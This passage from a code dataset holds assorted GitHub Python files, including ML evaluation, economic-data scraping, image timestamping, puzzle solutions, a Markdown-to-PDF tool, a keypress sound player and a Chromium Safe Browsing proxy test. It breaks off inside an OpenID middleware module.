dataset_dir)\n with tf.device('/device:CPU:0'):\n provider = slim.dataset_data_provider.DatasetDataProvider(dataset,\n shuffle=False,\n num_readers = 1,\n common_queue_capacity=200 * batch_size,\n common_queue_min=100 * batch_size)\n images, labels = provider.get(['image', 'label'])\n \n images = tf.to_float(images)\n images = tf.concat([(tf.slice(images,[0,0,0],[32,32,1])-112.4776)/70.4587,\n (tf.slice(images,[0,0,1],[32,32,1])-124.1058)/65.4312,\n (tf.slice(images,[0,0,2],[32,32,1])-129.3773)/68.2094],2)\n batch_images, batch_labels = tf.train.batch([images, labels],\n batch_size = batch_size,\n num_threads = 1,\n capacity = 200 * batch_size)\n \n batch_queue = slim.prefetch_queue.prefetch_queue([batch_images, batch_labels], capacity=50*batch_size)\n img, lb = batch_queue.dequeue()\n ## Load Model\n network_fn = nets_factory.get_network_fn(model_name)\n end_points = network_fn(img, is_training=False)\n print (end_points)\n task1 = tf.to_int32(tf.argmax(end_points['Logits'], 1))\n \n training_accuracy1 = slim.metrics.accuracy(task1, tf.to_int32(lb))\n \n variables_to_restore = slim.get_variables_to_restore()\n checkpoint_path = latest_checkpoint(train_dir)\n saver = Saver(variables_to_restore)\n config = ConfigProto()\n config.gpu_options.allow_growth=True\n sess = Session(config=config)\n sv = supervisor.Supervisor(logdir=checkpoint_path,\n summary_op=None,\n summary_writer=None,\n global_step=None,\n saver=None)\n correct = 0\n predict = 0\n with sv.managed_session(master='', start_standard_services=False, config=config) as sess:\n saver.restore(sess, checkpoint_path)\n optim_vars = tf.get_collection(tf.GraphKeys.GLOBAL_VARIABLES)\n layer = {}\n name = ['conv1w','conv1b',\n 'conv2w','conv2b',\n 'conv3w','conv3b',\n 'conv4w','conv4b',\n 'conv5w','conv5b',\n 'conv6w','conv6b',\n 'conv7w','conv7b',\n 'conv8w','conv8b',\n 'conv9w','conv9b',\n 'conv10w','conv10b',\n 'fc1w','fc1b','fc2w','fc2b','fc3w','fc3b']\n for i in range(0,len(optim_vars)):\n p = sess.run(optim_vars[i])\n layer[name[i]] = p\n# \n t = time.time()\n predict = np.array([0,0], dtype = float)\n sv.start_queue_runners(sess)\n l = 0\n for i in range(50):\n p1, l1, task = sess.run([task1, lb, training_accuracy1])\n predict += task\n correct += np.sum(np.where(p1 == l1, 1,0))\n print (time.time()-t)\n \n accuracy = correct/(dataset.num_samples)\n print (accuracy)\n \n sess.close()\nsio.savemat('/home/dmsl/nas/backup1/personal_lsh/training/cifar100/vgg13_noaug.mat',layer)\n","repo_name":"InhaDeeplearningGroup/Academic_research","sub_path":"LSH/tensorflow_slim/eval_classifier.py","file_name":"eval_classifier.py","file_ext":"py","file_size_in_byte":4173,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"52"} +{"seq_id":"23902805977","text":"# https://www.amphioxus.org/content/timelapse-time-stamp-overlay\nimport json\nimport os\nfrom PIL import Image, ImageFont, ImageDraw, ExifTags\nfrom datetime import datetime\n\nfont = ImageFont.truetype(\"PlusJakartaText-Regular.ttf\", 72)\nfontsmall = ImageFont.truetype(\"PlusJakartaText-Regular.ttf\", 32)\nfontcolor = (238,161,6)\ncounter = 0\n# Go through each file in current directory\nfor i in os.listdir(os.getcwd()):\n\tif i.endswith(\".jpg\"):\n\t\tcounter += 1\n\t\tprint(\"Image {0}: {1}\".format(counter, i))\n \n \t# https://stackoverflow.com/a/62077871/4442148\n\t\timage_exif = Image.open(i)._getexif()\n\t\t# Make a map with tag names\n\t\texif = { ExifTags.TAGS[k]: v for k, v in image_exif.items() if k in ExifTags.TAGS and type(v) is not 
bytes }\n\t\t# Grab the date\n\t\tdate_obj = datetime.strptime(exif['DateTimeOriginal'], '%Y:%m:%d %H:%M:%S')\n\n\t\tget_exif_datex = date_obj.strftime('%Y:%m:%d')\n\t\tget_exif_timex = date_obj.strftime('%H:%M')\n\n\t\timg = Image.open(i)\n \n\t\t# get a drawing context\n\t\tdraw = ImageDraw.Draw(img)\n\t\tdraw.text((img.width-220,img.height-150), get_exif_datex, fontcolor, font=fontsmall)\n\t\tdraw.text((img.width-220,img.height-120), get_exif_timex, fontcolor, font=font)\n\t\tfilename = \"resized/\" + i[0:-4] + \"-resized.jpg\"\n\t\timg.save(filename)\n","repo_name":"raspberryrippl3/timestamp-images-using-exif-data","sub_path":"timestamp.py","file_name":"timestamp.py","file_ext":"py","file_size_in_byte":1256,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"52"} +{"seq_id":"29087054769","text":"import numpy as np\nimport pandas as pd\nimport os\n\n# Call rate\nurl = \"http://www.stat-search.boj.or.jp/ssi/mtshtml/fm02_m_1.html\"\nCall_Rate = pd.DataFrame(pd.io.html.read_html(url)[0])\nCall_Rate = Call_Rate.set_axis(['Date', 'Call_Rate_End_Month', 'Call_Rate_Ave_Month'], axis=1)\nCall_Rate.drop(Call_Rate.loc[0:6].index, inplace=True)\nCall_Rate = Call_Rate.replace({\"ND\": \"\"})\nCall_Rate[\"Date\"] = pd.DatetimeIndex(Call_Rate[\"Date\"])\nCall_Rate[\"Date\"] = Call_Rate['Date'].dt.date.apply(lambda x: x.strftime('%Y-%m-%d'))\n\n# Lending Interest\nurl = \"http://www.stat-search.boj.or.jp/ssi/mtshtml/ir01_m_1.html\"\nLend_Int = pd.DataFrame(pd.io.html.read_html(url)[0])\nLend_Int.drop(Lend_Int.loc[0:6].index, inplace=True)\nLend_Int = Lend_Int.set_axis([\"Date\", \"Base_Lend_Rate\"], axis=1)\nLend_Int = Lend_Int.replace({\"ND\": \"\"})\nLend_Int[\"Date\"] = pd.DatetimeIndex(Lend_Int[\"Date\"])\nLend_Int[\"Date\"] = Lend_Int['Date'].dt.date.apply(lambda x: x.strftime('%Y-%m-%d'))\n\n# Monetary Base\nurl = \"http://www.stat-search.boj.or.jp/ssi/mtshtml/md01_m_1.html\"\nMB = pd.DataFrame(pd.io.html.read_html(url)[0])\nMB.drop(MB.loc[0:6].index, inplace=True)\nMB = MB.set_axis([\"Date\", \"Growth_MB\", \"Growth_MB_BOJ_Notes_Issued\", \"Growth_MB_Currency_Circulation\",\n \"Growth_MB_BOJ_Current_Deposit\", \"MB\", \"MB_BOJ_Notes_Issued\", \"MB_Currency_Circulation\",\n \"MB_BOJ_Current_Deposit\"], axis=1)\nMB = MB.replace({\"ND\": \"\"})\nMB[\"Date\"] = pd.DatetimeIndex(MB[\"Date\"])\nMB[\"Date\"] = MB['Date'].dt.date.apply(lambda x: x.strftime('%Y-%m-%d'))\n\n# Fx rate\nurl = \"http://www.stat-search.boj.or.jp/ssi/mtshtml/fm08_m_1.html\"\nFX_Rate = pd.DataFrame(pd.io.html.read_html(url)[0])\nFX_Rate.drop(FX_Rate.loc[0:6].index, inplace=True)\nFX_Rate = FX_Rate.set_axis(\n [\"Date\", \"FX_End_Month_17PM\", \"FX_Monthly_Average_17PM\", \"FX_End_Month_Central\", \"FX_Monthly_Average_Central\",\n \"FX_Month_Max\", \"FX_Month_Min\"], axis=1)\nFX_Rate = FX_Rate.replace({\"ND\": \"\"})\nFX_Rate[\"Date\"] = pd.DatetimeIndex(FX_Rate[\"Date\"])\nFX_Rate[\"Date\"] = FX_Rate['Date'].dt.date.apply(lambda x: x.strftime('%Y-%m-%d'))\n# Corporate CPI\nurl = \"http://www.stat-search.boj.or.jp/ssi/mtshtml/pr01_m_1.html\"\nCorp_CPI = pd.DataFrame(pd.io.html.read_html(url)[0])\nCorp_CPI.drop(Corp_CPI.loc[0:6].index, inplace=True)\nCorp_CPI = Corp_CPI.set_axis([\"Date\", \"CGPI_Average_Annual_Growth\", \"Export_GPI_Average_Annual_Growth\",\n \"Import_CPI_Average_Annual_Growth\", \"Ignore_This\",\n \"CGPI_Average\", \"Ignore_This\",\n \"Export_CPI_Average\", \"Import_CPI_Average\", \"Ignore_This\"], axis=1)\nCorp_CPI = Corp_CPI.replace({\"ND\": 
\"\"})\nCorp_CPI[\"Date\"] = pd.DatetimeIndex(Corp_CPI[\"Date\"])\nCorp_CPI[\"Date\"] = Corp_CPI['Date'].dt.date.apply(lambda x: x.strftime('%Y-%m-%d'))\n\n# Deposits\nurl = \"http://www.stat-search.boj.or.jp/ssi/mtshtml/md11_m_1.html\"\nDeposits = pd.DataFrame(pd.io.html.read_html(url)[0])\nDeposits.drop(Deposits.loc[0:6].index, inplace=True)\nDeposits = Deposits.set_axis([\"Date\", \"Total_Lending\", \"Lending_to_Corporate (Inc.Financial)\",\n \"Lending_to_Corporate_for_Facility_Investment\",\n \"Lending_to_Corporate_small_mid_Enterprises\",\n \"Lending_to_Individual\"], axis=1)\nDeposits = Deposits.replace({\"ND\": \"\"})\nDeposits[\"Date\"] = pd.DatetimeIndex(Deposits[\"Date\"])\nDeposits[\"Date\"] = Deposits['Date'].dt.date.apply(lambda x: x.strftime('%Y-%m-%d'))\n\n# Total Lending\nurl = \"http://www.stat-search.boj.or.jp/ssi/mtshtml/md13_m_1.html\"\nLend_Total = pd.DataFrame(pd.io.html.read_html(url)[0])\nLend_Total.drop(Lend_Total.loc[0:6].index, inplace=True)\nLend_Total = Lend_Total.set_axis([\"Date\", \"Total_Lending_of_Banks_and_Shinkin_Bank\", \"Total_Lending_of_Banks\",\n \"Growth_of_Total_Lending_of_Banks\",\n \"Total_Lending_of_Metropolitan_Banks\",\n \"Total_Lending_of_All_Local_Banks\",\n \"Total_Lending_of_Large_Local_Banks\",\n \"Total_Lending_of_Small_Local_Banks\",\n \"Total_Lending_of_Shinkin_Banks\",\n \"Total_Lending_of_Foreign_Banks\",\n \"Total_Lending_of_Other_Banks\"], axis=1)\nLend_Total = Lend_Total.replace({\"ND\": \"\"})\nLend_Total[\"Date\"] = pd.DatetimeIndex(Lend_Total[\"Date\"])\nLend_Total[\"Date\"] = Lend_Total['Date'].dt.date.apply(lambda x: x.strftime('%Y-%m-%d'))\n# Current Account\nurl = \"http://www.stat-search.boj.or.jp/ssi/mtshtml/bp01_m_1.html\"\nCurrent_Account = pd.DataFrame(pd.io.html.read_html(url)[0])\nCurrent_Account.drop(Current_Account.loc[0:6].index, inplace=True)\nCurrent_Account = Current_Account.set_axis([\"Date\", \"Current_Balance\", \"Financial_Balance\"], axis=1)\nCurrent_Account = Current_Account.replace({\"ND\": \"\"})\nCurrent_Account[\"Date\"] = pd.DatetimeIndex(Current_Account[\"Date\"])\nCurrent_Account[\"Date\"] = Current_Account['Date'].dt.date.apply(lambda x: x.strftime('%Y-%m-%d'))\n\n# Money Supply\nurl = \"http://www.stat-search.boj.or.jp/ssi/mtshtml/md02_m_1.html\"\nMon_Sup = pd.DataFrame(pd.io.html.read_html(url)[0])\nMon_Sup.drop(Mon_Sup.loc[0:6].index, inplace=True)\nMon_Sup = Mon_Sup.set_axis([\"Date\", \"Growth_M2\", \"Growth_M3\", \"Growth_M1\",\n \"Liquidity_Growth\", \"Cash_Currency_Growth\", \"Deposit_Currency_Growth\",\n \"Quasi-Currency_Growth\", \"Ignore_This\", \"M2\", \"M3\", \"M1\", \"Liquidity\",\n \"Cash_Currency\", \"Deposit_Currency\", \"Quasi_Currency\", \"Ignore_This\"], axis=1)\nMon_Sup = Mon_Sup.replace({\"ND\": \"\"})\nMon_Sup[\"Date\"] = pd.DatetimeIndex(Mon_Sup[\"Date\"])\nMon_Sup[\"Date\"] = Mon_Sup['Date'].dt.date.apply(lambda x: x.strftime('%Y-%m-%d'))\n\n# Bond amount\nurl = \"https://www.stat-search.boj.or.jp/ssi/html/nme_R020MM.3818.20220131234952.01.html\"\nBonds = pd.DataFrame(pd.io.html.read_html(url)[0])\nBonds.drop(Bonds.loc[0].index, inplace=True)\nBonds = Bonds.set_axis([\"Date\", \"Total_Bond_Earned\", \"Total_Bond_Disposed\", \"Net_Bond_Amount\",\n \"Long-Medium_Run_Bond_Earned\", \"Long-Medium_Run_Bond_Disposed\", \"Net_Long-Medium_Run_Bond\",\n \"Short_Run_Bond_Earned\", \"Short_Run_Bond_Disposed\", \"Net_Short_Run_Bond\",\n \"BOJ_Asset_Bond\"], axis=1)\nBonds = Bonds.replace({\"ND\": \"\"})\nBonds[\"Date\"] = pd.DatetimeIndex(Bonds[\"Date\"])\nBonds[\"Date\"] = 
Bonds['Date'].dt.date.apply(lambda x: x.strftime('%Y-%m-%d'))\n# Data Frame\nData = pd.merge(Corp_CPI, Call_Rate, how=\"left\")\nData = pd.merge(Data, Current_Account, how=\"left\")\nData = pd.merge(Data, Deposits, how=\"left\")\nData = pd.merge(Data, FX_Rate, how=\"left\")\nData = pd.merge(Data, Lend_Int, how=\"left\")\nData = pd.merge(Data, Lend_Total, how=\"left\")\ndel Data[\"Ignore_This\"]\nData = pd.merge(Data, MB, how=\"left\")\nData = pd.merge(Data, Mon_Sup, how=\"left\")\ndel Data[\"Ignore_This\"]\nData = pd.merge(Data, Bonds, how=\"left\")\n\nos.chdir(\"/Volumes/TanigakiSSD/EconData/\")\nData.to_csv(\"Japanese_Economics.csv\")\n","repo_name":"MasashiTanigaki/OpenSourceEcon","sub_path":"Economics_Japan.py","file_name":"Economics_Japan.py","file_ext":"py","file_size_in_byte":7067,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"35574003214","text":"import pandas as pd\nimport numpy as np\nimport transforms3d.euler as eul\nimport matplotlib.pyplot as plt\nimport os\n# be careful to make sure that the csv matches to the index\nos.chdir(r\"E:\\temp\\I\")\n\n# be careful to make sure that the csv matches to the index\nu = pd.read_csv(r'E:\\temp\\I\\stress.csv', header = 0, usecols = [3, 12,13,14,25])\nu.columns=[\"Part Instance\", \"x\", \"y\", \"z\",\"S33\" ]\n\nNoValue = \"ASSEMBLY\" ## remove the loading point\nindexNames = u[u[\"Part Instance\"]==NoValue].index\n\nu.drop(indexNames , inplace=True)\n\nu.drop(labels = \"Part Instance\", axis=1, inplace = True)\n\nu = u.astype(np.float64)\n\ndef plot_nodes(z,DF):\n df2 = DF.loc[DF[\"z\"]==z]\n\n df2['area'] = 1/df2['S33']\n \n area = np.sum(df2[\"area\"].values)\n return area\n\n\narea = plot_nodes(1.0,u)\n\n\n","repo_name":"wct24/wct24_shear_centre","sub_path":"old_code/I-beam/area.py","file_name":"area.py","file_ext":"py","file_size_in_byte":780,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"37591734380","text":"import sys\r\nfrom collections import deque\r\ninput = sys.stdin.readline\r\n\r\n\r\ndef game(K):\r\n queue = deque([K])\r\n\r\n cnt = 0\r\n while queue:\r\n k = queue.popleft()\r\n if len(tree[k]) == 1 and k != 1:\r\n cnt += visited[k]\r\n else:\r\n for t in tree[k]:\r\n if visited[t] == -1:\r\n visited[t] = visited[k] + 1\r\n queue.append(t)\r\n\r\n return cnt\r\n\r\n\r\nN = int(input())\r\n\r\ntree = [[] for _ in range(N + 1)]\r\nfor _ in range(N - 1):\r\n a, b = map(int, input().split())\r\n tree[a].append(b)\r\n tree[b].append(a)\r\n\r\nvisited = [-1] * (N + 1)\r\nvisited[1] = 0\r\nresult = game(1)\r\n\r\nif result % 2:\r\n print('Yes')\r\nelse:\r\n print('No')","repo_name":"ict-cspark/Algorithm","sub_path":"백준/Silver/15900. 
나무 탈출/나무 탈출.py","file_name":"나무 탈출.py","file_ext":"py","file_size_in_byte":723,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"12300994775","text":"import common\nfrom common import TestDriver\nfrom common import IntegrationTest\nfrom decorators import AndroidOnly\nfrom decorators import NotAndroid\n\nfrom selenium.common.exceptions import TimeoutException\n\nclass SafeBrowsing(IntegrationTest):\n\n @AndroidOnly\n def testSafeBrowsingOn(self):\n with TestDriver() as t:\n t.AddChromeArg('--enable-spdy-proxy-auth')\n\n # Starting in M63 LoadURL will timeout when the safebrowsing\n # interstitial appears.\n try:\n t.LoadURL('http://testsafebrowsing.appspot.com/s/malware.html')\n responses = t.GetHTTPResponses()\n self.assertEqual(0, len(responses))\n except TimeoutException:\n pass\n\n @NotAndroid\n def testSafeBrowsingOff(self):\n with TestDriver() as t:\n t.AddChromeArg('--enable-spdy-proxy-auth')\n t.LoadURL('http://testsafebrowsing.appspot.com/s/malware.html')\n responses = t.GetHTTPResponses()\n self.assertEqual(1, len(responses))\n for response in responses:\n self.assertHasChromeProxyViaHeader(response)\n\nif __name__ == '__main__':\n IntegrationTest.RunAllTests()\n","repo_name":"kiwibrowser/src","sub_path":"tools/chrome_proxy/webdriver/safebrowsing.py","file_name":"safebrowsing.py","file_ext":"py","file_size_in_byte":1100,"program_lang":"python","lang":"en","doc_type":"code","stars":2475,"dataset":"github-code","pt":"52"} +{"seq_id":"22141159864","text":"from collections import namedtuple\nimport os\nimport re\n\npath = './process_directory/'\n\ndef main():\n files = []\n for r, d, f in os.walk(path):\n for file in f:\n if '.txt' in file:\n files.append(os.path.join(r, file))\n\n for f in files:\n # Processing Each file data put it in array\n company_data = []\n with open(f, \"r\") as f:\n # Reading a company text file line by line\n contents = f.readlines()\n header = contents[0].strip() # Extracting Headers of the file\n header = re.sub(r'\\s+', ', ', header) # Cleaning the data\n \n # Creating a lightweight object type for company info\n # where class properties like Date, CompanyName, Volume, Open, High etc. 
would be available\n Company = namedtuple('Company', header) \n for item in contents[1:]:\n item = re.sub(r'\\s+', ' ', item.strip()).split()\n # Storing each company object details to array\n c = Company(*item)\n company_data.append(c)\n # Here, We get the each company info in Object oriented fashion.\n # Now user either can store into DB or call 3rd party API\n # for this example I am printing the data\n print(company_data)\n\nif __name__ == \"__main__\":\n main()\n\n","repo_name":"birendra7654/NamedTuple","sub_path":"process.py","file_name":"process.py","file_ext":"py","file_size_in_byte":1370,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"13747496373","text":"#!/usr/bin/env python3\n\n# Command line flags\n\nimport argparse\n\nparser = argparse.ArgumentParser(description='Converts Markdown to elegant PDF reports')\nparser.add_argument('--basic', dest='basic', action='store_true',\n help='Do not enrich HTML with LaTeX and syntax highlighting (faster builds)')\nparser.add_argument('--watch', dest='watch', action='store_true',\n help='Watch the current folder for changes and rebuild automatically')\nparser.add_argument('--quiet', dest='quiet', action='store_true',\n help='Do not output any information')\nparser.add_argument(\"--timeout\", type=int, default=2,\n help='Page generation timeout')\nparser.set_defaults(watch=False)\nargs = parser.parse_args()\n\nfrom weasyprint import HTML\n\nfrom shutil import copyfile\nfrom distutils.dir_util import copy_tree\nfrom tempfile import gettempdir\nfrom time import time, sleep\nfrom sys import stdout, stderr\nimport subprocess\nimport re, glob, os\n\n# Check directory\n\nok = False\nfor file in os.listdir(\".\"):\n if file.endswith(\".md\"):\n ok = True\n break\nif not ok:\n stderr.write(\"No markdown file found in the current folder\")\n exit(1)\n\nscript_path = os.path.dirname(os.path.realpath(__file__))\n\n# Temp dir\n\ntimestamp = str(int(time()))\ntmp_dir = gettempdir() + \"/\" + timestamp + \"_md-report/\"\nos.makedirs(tmp_dir, exist_ok=True)\n\n# Headless browser\n\nif not args.basic:\n from selenium import webdriver\n from selenium.webdriver.firefox.options import Options\n from selenium.webdriver.common.desired_capabilities import DesiredCapabilities\n\n options = Options()\n options.headless = True\n options.log.level = \"trace\"\n\n d = DesiredCapabilities.FIREFOX\n d['loggingPrefs'] = { 'browser':'ALL' }\n\n driver = webdriver.Firefox(options=options,capabilities=d)\n driver.set_page_load_timeout(args.timeout)\n\nprev_compile_time = 0\ndef recompile(notifier):\n if notifier is not None and (notifier.maskname != \"IN_MODIFY\" or notifier.pathname.endswith(\".pdf\")):\n return\n global prev_compile_time\n if time() - prev_compile_time < 1:\n return\n prev_compile_time = time()\n\n if not args.quiet:\n stdout.write(\"\\rBuilding the PDF file...\")\n stdout.flush()\n\n files = glob.glob(tmp_dir + '/*.md')\n for f in files:\n os.remove(f)\n\n copyfile(script_path + \"/base.html\", tmp_dir + \"/base.html\")\n if not os.path.islink(tmp_dir + \"/src\"):\n os.symlink(script_path + \"/src\", tmp_dir + \"/src\")\n copy_tree(\".\", tmp_dir)\n\n # Base HTML Template\n\n base_html = \"\"\n with open(tmp_dir + \"base.html\", \"r\") as base_html_file:\n base_html = base_html_file.read()\n\n # Markdown parsing\n\n subprocess.check_output(script_path + \"/md-parsing \" + tmp_dir, shell=True)\n html_file_name = tmp_dir + \"output.html\"\n\n # Interpret JS code\n\n if not args.basic:\n 
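# headless Firefox loads the generated HTML so client-side scripts (e.g. the LaTeX and\n        # syntax-highlighting enrichment) can finish; the rendered DOM is then written back for WeasyPrint\n        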
driver.get(\"file:///\" + html_file_name)\n sleep(2)\n elem = driver.find_element_by_xpath(\"//*\")\n interpreted_html = elem.get_attribute(\"outerHTML\")\n\n with open(html_file_name, \"w\") as html_out_file:\n html_out_file.write(interpreted_html)\n\n # Create final PDF file\n\n pdf = HTML(html_file_name).write_pdf()\n f = open(\"output.pdf\",'wb')\n f.write(pdf)\n\n if not args.quiet:\n stdout.write(\"\\rDone. \")\n stdout.flush()\n\nrecompile(None)\n\nif not args.watch:\n if not args.basic:\n driver.quit()\n exit(0)\n\nimport pyinotify\n\nwatch_manager = pyinotify.WatchManager()\nevent_notifier = pyinotify.Notifier(watch_manager, recompile)\n\nwatch_manager.add_watch(os.path.abspath(\".\"), pyinotify.ALL_EVENTS, rec=True)\nevent_notifier.loop()\n\nif not args.basic:\n driver.quit()\n","repo_name":"rginestou/MarkReport","sub_path":"MarkReport/MarkReport.py","file_name":"MarkReport.py","file_ext":"py","file_size_in_byte":3697,"program_lang":"python","lang":"en","doc_type":"code","stars":33,"dataset":"github-code","pt":"52"} +{"seq_id":"32089866710","text":"from pathlib import Path\n\n\ndef load_input(file_name):\n with open(file_name, \"r\") as file:\n return file.read().splitlines()\n\n\nfilename = f\"{Path(__file__).stem}.input\"\nprint(filename)\ninstructions = load_input(filename)\nprint(instructions)\n\naim = 0\nhorizontal = 0\ndepth = 0\n\nfor command in instructions:\n print(command)\n name = command.split(\" \")[0]\n value = command.split(\" \")[1]\n\n if name == \"down\":\n aim += int(value)\n elif name == \"up\":\n aim -= int(value)\n elif name == \"forward\":\n horizontal += int(value)\n depth += (aim * int(value))\n else:\n print(f\"unknown command found: {command}\")\n\nresult = horizontal * depth\nprint(f\"result : {result}\")","repo_name":"NikolaiAtanasoski/advent-of-code-2021","sub_path":"old/day02.py","file_name":"day02.py","file_ext":"py","file_size_in_byte":712,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"37929464060","text":"n,k=map(int,input().split(\" \"))\nnOdd=0;nEven=0\nif n%2==0:\n nOdd=n//2\n nEven=n//2\nelse:\n nOdd=n//2+1\n nEven=nOdd-1\nans=0\nif k<=nOdd:\n ans=1+(k-1)*2\nelse:\n k-=nOdd\n ans=2+(k-1)*2\nprint(ans)\n","repo_name":"nautidpk/codeforce-problem-solving","sub_path":"evenOdds.py","file_name":"evenOdds.py","file_ext":"py","file_size_in_byte":209,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"35518925467","text":"from random import choice\nfrom pyxhook import HookManager\nfrom os.path import dirname, abspath\nimport signal, sys, time\nimport os\n\nsounds_dir = os.path.dirname(os.path.realpath(__file__))\nk_backspace = 'backspace.mp3'\nk_return = 'return.mp3'\nk_scrollDown = 'scrollDown.mp3'\nk_scrollUp = 'scrollUp.mp3'\nk_space = 'space.mp3'\nk_generic = ['key-01.mp3',\n 'key-02.mp3',\n 'key-03.mp3',\n 'key-04.mp3',\n 'key-05.mp3']\n\ndef play_sound(event):\n if event.Key == 'Return':\n sound = k_return\n elif event.Key == 'Up':\n sound = k_scrollUp\n elif event.Key == 'Down':\n sound = k_scrollDown\n elif event.Key == 'space':\n sound = k_space\n elif event.Key == 'BackSpace':\n sound = k_backspace\n elif event.Ascii:\n sound = choice(k_generic)\n else:\n sound = None\n\n if sound:\n os.system('mpg123 --quiet {0}/sounds/{1} &'.format(sounds_dir, sound))\n\ndef sigint_handler(signum, frame):\n print ('Received SIGINT', file=sys.stderr) # Say to the user what is going on\n hm.cancel() # Stop hm threads properly\n 
time.sleep(0.2) # Wait for threads to finish (usefull on small configs)\n sys.exit(0) # Free memory and exit\n\ndef main():\n signal.signal (signal.SIGINT, sigint_handler)\n #hm.HookKeyboard() # Dummy function in pyxhook\n #hm.HookMouse() # Dummy function in pyxhook\n #hm.KeyDown = play_sound\n hm.KeyUp = play_sound\n hm.start()\n\nif __name__ == '__main__':\n hm = HookManager() # Make hm global for sigint_handler to be able to access it\n main()\n hm.join() # Get __main__ thread to wait for hm to join\n","repo_name":"mikeholler/pyty","sub_path":"pyty.py","file_name":"pyty.py","file_ext":"py","file_size_in_byte":1772,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"52"} +{"seq_id":"12511148335","text":"# (c) 2005 Ben Bangert\n# This module is part of the Python Paste Project and is released under\n# the MIT License: http://www.opensource.org/licenses/mit-license.php\n\"\"\"\nOpenID Authentication (Consumer)\n\nOpenID is a distributed authentication system for single sign-on originally\ndeveloped at/for LiveJournal.com.\n\n http://openid.net/\n\nURL. You can have multiple identities in the same way you can have multiple\nURLs. All OpenID does is provide a way to prove that you own a URL (identity).\nAnd it does this without passing around your password, your email address, or\nanything you don't want it to. There's no profile exchange component at all:\nyour profiile is your identity URL, but recipients of your identity can then\nlearn more about you from any public, semantically interesting documents\nlinked thereunder (FOAF, RSS, Atom, vCARD, etc.).\n\n``Note``: paste.auth.openid requires installation of the Python-OpenID\nlibraries::\n\n http://www.openidenabled.com/\n\nThis module is based highly off the consumer.py that Python OpenID comes with.\n\nUsing the OpenID Middleware\n===========================\n\nUsing the OpenID middleware is fairly easy, the most minimal example using the\nbasic login form thats included::\n\n # Add to your wsgi app creation\n from paste.auth import open_id\n\n wsgi_app = open_id.middleware(wsgi_app, '/somewhere/to/store/openid/data')\n\nYou will now have the OpenID form available at /oid on your site. Logging in will\nverify that the login worked.\n\nA more complete login should involve having the OpenID middleware load your own\nlogin page after verifying the OpenID URL so that you can retain the login\ninformation in your webapp (session, cookies, etc.)::\n\n wsgi_app = open_id.middleware(wsgi_app, '/somewhere/to/store/openid/data',\n login_redirect='/your/login/code')\n\nYour login code should then be configured to retrieve 'paste.auth.open_id' for\nthe users OpenID URL. 
If this key does not exist, the user has not logged in.\n\nOnce the login is retrieved, it should be saved in your webapp, and the user\nshould be redirected to wherever they would normally go after a successful\nlogin.\n\"\"\"\n\n__all__ = ['AuthOpenIDHandler']\n\nimport cgi\nimport urlparse\nimport re\nimport six\n\nimport paste.request\nfrom paste import httpexceptions\n\ndef quoteattr(s):\n qs = cgi.escape(s, 1)\n return '\"%s\"' % (qs,)\n\n# You may need to manually add the openid package into your\n# python path if you don't have it installed with your system python.\n# If so, uncomment the line below, and change the path where you have\n# Python-OpenID.\n# sys.path.append('/path/to/openid/')\n\nfrom openid.store import filestore\nfrom openid.consumer import consumer\nfrom openid.oidutil import appendArgs\n\nclass AuthOpenIDHandler(object):\n \"\"\"\n This middleware implements OpenID Consumer behavior to authenticate a\n URL against an OpenID Server.\n \"\"\"\n\n def __init__(self, app, data_store_path, auth_prefix='/oid',\n login_redirect=None, catch_401=False,\n url_to_username=None):\n \"\"\"\n Initialize the OpenID middleware\n\n ``app``\n Your WSGI app to call\n\n ``data_store_path``\n Directory to store crypto data in for use with OpenID servers.\n\n ``auth_prefix``\n Location for authentication process/verification\n\n ``login_redirect``\n Location to load after successful process of login\n\n ``catch_401``\n If true, then any 401 responses will turn into open ID login\n requirements.\n\n ``url_to_username``\n A function called like ``url_to_username(environ, url)``, which should\n return a string username. If not given, the URL will be the username.\n \"\"\"\n store = filestore.FileOpenIDStore(data_store_path)\n self.oidconsumer = consumer.OpenIDConsumer(store)\n\n self.app = app\n self.auth_prefix = auth_prefix\n self.data_store_path = data_store_path\n self.login_redirect = login_redirect\n self.catch_401 = catch_401\n self.url_to_username = url_to_username\n\n def __call__(self, environ, start_response):\n if environ['PATH_INFO'].startswith(self.auth_prefix):\n # Let's load everything into a request dict to pass around easier\n request = dict(environ=environ, start=start_response, body=[])\n request['base_url'] = paste.request.construct_url(environ, with_path_info=False,\n with_query_string=False)\n\n path = re.sub(self.auth_prefix, '', environ['PATH_INFO'])\n request['parsed_uri'] = urlparse.urlparse(path)\n request['query'] = dict(paste.request.parse_querystring(environ))\n\n path = request['parsed_uri'][2]\n if path == '/' or not path:\n return self.render(request)\n elif path == '/verify':\n return self.do_verify(request)\n elif path == '/process':\n return self.do_process(request)\n else:\n return self.not_found(request)\n else:\n if self.catch_401:\n return self.catch_401_app_call(environ, start_response)\n return self.app(environ, start_response)\n\n def catch_401_app_call(self, environ, start_response):\n \"\"\"\n Call the application, and redirect if the app returns a 401 response\n \"\"\"\n was_401 = []\n def replacement_start_response(status, headers, exc_info=None):\n if int(status.split(None, 1)) == 401:\n # @@: Do I need to append something to go back to where we\n # came from?\n was_401.append(1)\n def dummy_writer(v):\n pass\n return dummy_writer\n else:\n return start_response(status, headers, exc_info)\n app_iter = self.app(environ, replacement_start_response)\n if was_401:\n try:\n list(app_iter)\n finally:\n if hasattr(app_iter, 'close'):\n 
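# let the discarded 401 response release any resources it holds before redirecting\n                    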
